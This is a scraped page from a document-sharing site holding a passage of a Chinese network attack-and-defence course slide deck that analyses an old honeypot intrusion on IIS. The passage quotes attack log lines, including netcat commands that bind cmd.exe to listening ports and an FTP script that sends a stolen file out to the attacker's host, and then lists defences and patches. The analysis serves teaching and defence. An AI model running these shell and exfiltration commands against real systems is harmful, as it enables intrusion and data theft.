- 1、本文档共104页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
* * * * * * * 问题3: 闲逛(寻找有价值信息)+炫耀 攻击者又创建了2个NetCat监听服务,并在新的6868端口连入,但奇怪的是攻击者换了个IP地址56。 21:16:41 X:2002 - T:80 exec (unicode) nc -l -p 6968 -e cmd1.exe 21:19:05 X:2007 - T:80 exec (unicode) nc -l -p 6868 -e cmd1.exe 21:20:44 Y:1345 - T:6868 incoming NC cmd.exe: ./log/06/SESSION:6868-1345 闲逛:对蜜罐主机上exploits目录体现了特别兴趣 21:25:03 Y:1345 - T:6868 types echo best honeypot ive seen till now :) rfp.txt 21:25:49 X:2022 - T:80 view (unicode): boot.ini and READ.NOW.hax0r 21:26:06 X:2023 - T:80 view (unicode): READ.me.NOW.hax0r 炫耀:Web根目录创建了test.txt文件,象征性修改首页” echo . default.htm” 21:36:02 X:2091 - T:80 get /test.txt, result “this can‘t be true” 21:34、8 21:37、42 21:38、10 21:38、96 21:39、 86 21:39、 21:39、3 21:42、07 21:44、3 21:46、 21:52、6 21:56、7 21:59、20 22:18 * 网络攻防技术与实践课程 Copyright (c) 2008-2009 诸葛建伟 * 问题3: Cleanup+”顺手牵羊” 21:50:27 X:2150 - T:80 exec(unicode): copy c:\winnt\system32\cmd.exe cmd1.exe 21:50:37 X:2151 - T:80 exec(unicode): construct ftp script ftpcom ? ftpcom open X johna2k haxedj00 put c:\wiretrip\whisker.tar.gz quit ftpcom ? 21:51:29 X:2177 - T:80 exec (unicode): ftp -s:ftpcom 21:51:29 T:3158 - X:21 ftp transfer of stolen whisker, ascii 21:54:13 X:2187 - T:80 exec (unicode) del ftpcom * 网络攻防技术与实践课程 Copyright (c) 2008-2009 诸葛建伟 * 问题4-如何防止这样的攻击? 直接防御措施:打补丁 Unicode - /technet/security/bulletin/ms00-057.asp RDS - /technet/security/Bulletin/MS02-065.mspx 进一步防御措施:IIS安全防范措施 1. 为这些漏洞打上补丁 2. 禁用用不着的RDS等服务 3. 防火墙封禁网络内部服务器发起的连接 4. 为web server在单独的文件卷上设置虚拟根目录 5. 使用NTFS文件系统,因为FAT几乎不提供安全功能 6. 使用IIS Lockdown 和 URLScan 等工具加强web server Now: Update to IIS v6.x or switch to latest Apache * 网络攻防技术与实践课程 Copyright (c) 2008-2009 诸葛建伟 * 问题5-攻击者是否警觉了他的目标是一台蜜罐主机? 是的,攻击者绝对意识到了他的目标是作为蜜罐主机的. 1. 因为他建立了一个文件,并输入了如下内容C:\echo best honeypot ive seen till now :) rfp.txt. 2. 因为该目标主机作为rfp的个人网站,Web服务所使用的IIS甚至没有更新rfp自己所发现的MDAC RDS安全漏洞,很容易让攻击者意识到这绝对是台诱饵。 * 网络攻防技术与实践课程 Copyright (c) 2008-2009 诸葛建伟 * * 网络攻防技术与实践课程 Copyright (c) 2008-2009 诸葛建伟 * 内容 Windows系统查点 Windows系统远程攻击 Windows系统本地攻击 案
您可能关注的文档
- 最佳机械设计奖 厦门大学RCS笃行队厦门大学.pptx
- 实景指挥系统技服培训课件.pptx
- 技术架构演变全景图-从单体式到云原生.pptx
- 播放列表和排期课件.ppt
- 沪正玻璃隔热涂料介绍课件.ppt
- DMP数据管理平台关键技术解读课件.ppt
- 全通教育智园逸课开排选.pptx
- 杭州方圆塑机股份有限公司应用案例.ppt
- 超星光全景球技术培训课件.pptx
- 生物合成-发酵罐及灭菌方法完整课件.ppt
- 2023年江苏省镇江市润州区中考生物二模试卷+答案解析.pdf
- 2023年江苏省徐州市邳州市运河中学中考生物二模试卷+答案解析.pdf
- 2023年江苏省苏州市吴中区中考冲刺数学模拟预测卷+答案解析.pdf
- 2023年江苏省南通市崇川区田家炳中学中考数学四模试卷+答案解析.pdf
- 2023年江西省吉安市中考物理模拟试卷(一)+答案解析.pdf
- 2023年江苏省泰州市海陵区九年级(下)中考三模数学试卷+答案解析.pdf
- 2023年江苏省苏州市高新二中中考数学二模试卷+答案解析.pdf
- 2023年江苏省南通市九年级数学中考复习模拟卷+答案解析.pdf
- 2023年江苏省南通市海安市九年级数学模拟卷+答案解析.pdf
- 2023年江苏省泰州市靖江外国语学校中考数学一调试卷+答案解析.pdf
文档评论(0)